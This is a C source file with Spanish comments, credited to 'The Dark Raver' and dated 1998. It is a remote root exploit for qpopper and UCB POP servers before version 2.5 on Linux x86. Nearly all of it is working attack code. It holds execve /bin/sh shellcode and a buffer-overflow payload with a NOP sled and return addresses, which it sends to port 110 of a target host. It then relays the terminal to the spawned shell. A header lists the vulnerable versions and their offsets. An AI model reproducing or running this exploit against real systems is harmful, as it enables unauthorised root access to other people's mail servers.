/* 
 * - qp.c - Exploit remoto para linux x86
 *
 * Versiones de qpopper afectadas: (UCB pop y derivados anteriores a QPOP 2.5)
 * -> +OK UCB Pop server (version 2.0) at xxxx starting.
 * -> +OK UCB Pop server (version 2.1.3-R3) at xxxx starting.
 * -> +OK QUALCOMM Pop server derived from UCB (version 2.1.4-R3) at xxxx starting.
 * -> +OK QPOP (version 2.2) at xxxx starting. [Suse-offset=1000]
 * -> +OK QPOP (version 2.3) at xxxx starting. [Debian=no_explotable]
 * -> +OK QPOP (version 2.4) at xxxx starting. [Offset=2500]
 *
 * Compilado (Cut & Paste ;) a partir de 2 exploits anteriores:
 * - qpopx.c - remote root exploit para BSD de Miroslaw Grzybek 
 *   <mig@zeus.polsl.gliwice.pl>
 * - qpush.c - qualcom popper buffer overflow exploit para linux de Herbert 
 *   Rosmanith <herp@wildsau.idv.uni-linz.ac.at>
 *
 * The Dark Raver <darkraver@t0s.org>    Murcia 22/11/98
 *
 */
 

#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/errno.h>

char *shell=
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
"\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
"\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
"\xff\xff/bin/sh.........";

#define ADDR 0xbfffec2c
#define OFFSET 0
#define BUFLEN 1024

char    buf[BUFLEN];
int     offset=OFFSET;

int     sock;
struct  sockaddr_in sa;
struct  hostent *hp;

void main (int argc, char *argv[]) {
        int i;

        if(argc<2) {
                printf("Usage: %s <host> [offset]\n",argv[0]);
                exit(0); }
        if(argc>2)
                offset=atoi(argv[2]);

        memset(buf,0x90,BUFLEN);
        memcpy(buf+800,shell,strlen(shell));
        for(i=901;i<BUFLEN-4;i+=4)
                *(int *)&buf[i]=ADDR+offset;
        buf[BUFLEN]='\n';

        if((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) {
                perror("gethostbyname()");
                exit(0); }
        if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
                perror("socket()");
                exit(0); }
        sa.sin_family=AF_INET;
        sa.sin_port=htons(110);
        memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
        if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
                perror("connect()");
                exit(0); }
        printf("CONNECTED TO %s... SENDING DATA\n",argv[1]); fflush(stdout);
        write(sock,buf,strlen(buf));

        while(1) {
                fd_set input;

                FD_SET(0,&input);
                FD_SET(sock,&input);
                if((select(sock+1,&input,NULL,NULL,NULL))<0) {
                        if(errno==EINTR) continue;
                        printf("CONNECTION CLOSED...\n"); fflush(stdout);
                        exit(1); }
                if(FD_ISSET(sock,&input))
                        write(1,buf,read(sock,buf,BUFLEN));
                if(FD_ISSET(0,&input))
                        write(sock,buf,read(0,buf,BUFLEN));
        }
}